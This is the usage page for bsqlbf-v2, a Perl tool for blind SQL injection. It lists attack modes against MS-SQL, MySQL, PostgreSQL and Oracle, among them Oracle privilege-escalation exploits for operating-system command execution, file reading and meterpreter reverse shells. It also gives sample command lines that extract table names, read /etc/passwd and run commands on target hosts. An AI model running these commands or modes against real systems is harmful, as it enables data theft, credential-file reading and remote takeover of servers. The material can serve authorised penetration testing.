bsqlbf-v2 - Blind Sql Injection Brute Forcer version 2


This is a modified version of 'bsqlbfv1.2-th.pl'. This perl script allows extraction of data from Blind SQL Injections. It accepts custom SQL queries as a command line parameter and it works for both integer and string based injections. Databases supported:
0. MS-SQL
1. MySQL
2. PostgreSQL
3. Oracle
The tool supports 8 attack modes(-type switch):-

Type 0: Blind SQL Injection based on true and false conditions returned by back-end server
Type 1: Blind SQL Injection based on true and error(e.g syntax error) returned by back-end server.
Type 2: Blind SQL Injection in "order by" and "group by".
Type 3: extracting data with SYS privileges (ORACLE dbms_export_extension exploit)
Type 4: is O.S code execution (ORACLE dbms_export_extension exploit)
Type 5: is reading files (ORACLE dbms_export_extension exploit, based on java)
Type 6: is O.S code execution DBMS_REPCAT_RPC.VALIDATE_REMOTE_RC exploit
Type 7: is O.S code execution SYS.KUPP$PROC.CREATE_MASTER_PROCESS(), DBA Privs
-cmd=revshell Type 7 supports meterpreter payload execution, run generator.exe first
Type 8: is O.S code execution DBMS_JAVA_TEST.FUNCALL, with JAVA IO Permissions
-cmd=revshell Type 8 supports meterpreter payload execution, run generator.exe first

For Type 4(O.S code execution) the following methods are supported:
-stype: How you want to execute command:
SType 0 (default) is based on java..will NOT work against XE.
SType 1 is against oracle 9 with plsql_native_make_utility.
SType 2 is against oracle 10 with dbms_scheduler.
Download -
bsqlbf-v2-7.pl

Download other versions from here -
http://code.google.com/p/bsqlbf-v2/downloads/list



Usage example:
$./bsqlbf-v2.pl -url http://192.168.1.1/injection_string_post/1.asp?p=1 -method post -match true -database 0 -sql "select top 1 name from sysobjects where xtype='U'"
./bsqlbf-v2.3.pl -url http://192.168.1.1/injection_string_post/1.jsp?p=1 -type 4 -match "true" -cmd "ping notsosecure.com"

User Interface:
ubuntu@ubuntu:~$ ./bsqlbf-v2-3.pl 



// Blind SQL injection brute forcer \\
//originally written by...aramosf@514.es \\

// mofified by sid-at-notsosecure.com \\
// http://www.notsosecure.com \\
---------------------usage:-------------------------------------------


Integer based Injection-->./bsqlbf-v2-3.pl - url http://www.host.com/path/script.php?foo=1000 (options)

String Based Injection-->./bsqlbf-v2-3.pl - url http://www.host.com/path/script.php?foo=bar' (options)

------------------------------------options:--------------------------
-sql: valid SQL syntax to get; version(), database(),
(select table_name from inforamtion_schema.tables limit 1 offset 0)
-get: If MySQL user is root, supply word readable file name
-blind: parameter to inject sql. Default is last value of url
-match: *RECOMMENDED* string to match in valid query, Default is auto
-start: if you know the beginning of the string, use it.
-length: maximum length of value. Default is 32.
-time: timer options:
0: dont wait. Default option.
1: wait 15 seconds
2: wait 5 minutes


-type: Type of injection:
0: Type 0 (default) is blind injection based on True and False responses
1: Type 1 is blind injection based on True and Error responses
2: Type 2 is injection in order by and group by
3: Type 3 !!New!! is extracting data with SYS privileges (ORACLE dbms_export_extension exploit)
4: Type 4 !!New!! is O.S code execution (ORACLE dbms_export_extension exploit)
5: Type 5 !!New!! is reading files (ORACLE dbms_export_extension exploit, based on java)


-file: File to read (default C:\boot.ini)


-stype: How you want to execute command:
0: SType 0 (default) is based on java..will NOT work against XE
1: SType 1 is against oracle 9 with plsql_native_make_utility
2: SType 2 is against oracle 10 with dbms_scheduler
-database: Backend database:
0: MS-SQL (Default)
1: MYSQL
2: POSTGRES
3: ORACLE
-rtime: wait random seconds, for example: "10-20".
-method: http method to use; get or post. Default is GET.
-cmd: command to execute(type 4 only). Default is "ping 127.0.0.1."
-uagent: http UserAgent header to use. Default is bsqlbf 2.3
-ruagent: file with random http UserAgent header to use.
-cookie: http cookie header to use
-rproxy: use random http proxy from file list.
-proxy: use proxy http. Syntax -proxy=http://proxy:port/ -proxy_user: proxy http user
-proxy_pass: proxy http password


---------------------------- examples:-------------------------------
bash# ./bsqlbf-v2-3.pl -url http://www.somehost.com/blah.php?u=5 -blind u -sql "select table_name from imformation_schema.tables limit 1 offset 0" -database 1 -type 1


bash# ./bsqlbf-v2-3.pl -url http://www.buggy.com/bug.php?r=514&p=foo' -method post -get "/etc/passwd" -match "foo"